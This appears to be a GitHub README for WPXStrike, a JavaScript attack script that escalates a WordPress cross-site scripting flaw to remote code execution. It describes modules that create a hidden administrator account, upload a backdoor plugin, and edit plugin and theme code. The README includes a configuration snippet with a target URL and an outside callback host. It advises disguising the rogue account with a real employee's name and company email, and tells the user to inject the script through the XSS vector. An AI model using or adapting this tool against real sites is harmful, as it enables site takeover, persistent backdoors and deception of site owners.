
WPXStrike is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other's criticals vulnerabilities in WordPress

Primary LanguageJavaScript


WordPress Exploitation Script that elevate XSS to RCE or Others Critical Vulnerabilties.

AboutKey FeaturesHow To UseExamplesContributing



WPXStrike is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other's criticals vulnerabilities in WordPress.

This script provides support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. 🌟

Key Features

  • Privilege Escalation
    • Creates an user in WordPress.
  • (RCE) Custom Plugin (backdoor) Upload
    • Upload your custom plugin (backdoor) to WordPress.
  • (RCE) Built-In Plugin Edit
    • Edit a Built-In Plugins in WordPress.
  • (RCE) Built-In Theme Edit
    • Edit a Built-In Themes in WordPress.
  • (Custom) Custom Exploits
    • Custom Exploits for Third-Party WordPress Plugins/Themes.

How To Use


1) Clone the Repository

git clone https://github.com/nowak0x01/WPXStrike

2) Edit the script by selecting the desired function, modifying its variable values and select the module. (Example: WPCreateAccount())

// ************************************ ~% Variables %~ ************************************ //

var Target = "https://wordpress.example.com/"; // Ex:
var Callback = "https://fqgx7638bcvddnsrufh3nxbozd.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).

// ************************************ ~% Functions %~ ************************************ //

WPCreateAccount(); // (Privilege Escalation) - Creates an user in WordPress.
// WPUploadCustomPlugin(); // (RCE) - Upload your custom plugin (backdoor) to WordPress.
// WPEditPlugins(); // (RCE) - Edit a Built-In Plugins in WordPress.
// WPEditThemes(); // (RCE) - Edit a Built-In Themes in WordPress.
// CustomExploits(); // (Custom) - Custom Exploits for Third-Party WordPress Plugins/Themes.

function WPCreateAccount() {

    /* ************************************************************************************************************************************************ */
    var Username = "nowak";         // Ex: operator (It is recommended to use a valid employee name from the target company).
    var Password = `j^QEkyvd7*g3xqsE`;          // (weak password are allowed).
    var Email = "nowak@example.com";  // Ex: user@company.net (It is recommended to use a business email from the target company) (No email will be sent to the email address entered).
    var Role = "administrator";                 // Ex: administrator, editor, author, contributor, subscriber.
    var FirstName = ""; // (optional)
    var LastName = "";  // (optional)
    /* ************************************************************************************************************************************************ */

    // ************************************ ~% WPCreateAccount Modules %~ ************************************ //
    // [#] Choose one of the available modules [#] //
    WPXCreateAccount(); // Wordpress Create Account Module for Wordpress 6.X.X, 5.X.X and 4.X.X.
    /* ************************************************************************************************************************************************ */

    // Wordpress Create Account Module for Wordpress 6.X.X, 5.X.X and 4.X.X.
    function WPXCreateAccount() {

3) Start a web server

php -S -t .

4) Go to the WordPress XSS vector and include WPXStrike.js



WPCreateAccount() - Creates an user in WordPress.


WPUploadCustomPlugin() - Upload your custom plugin (backdoor) to WordPress.


WPEditThemes() - Edit a Built-In Themes in WordPress.


WPEditPlugins() - Edit a Built-In Plugins in WordPress.


CustomExploits() - Custom Exploits for Third-Party WordPress Plugins/Themes.
// pending


If you're interested in contributing, enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better.

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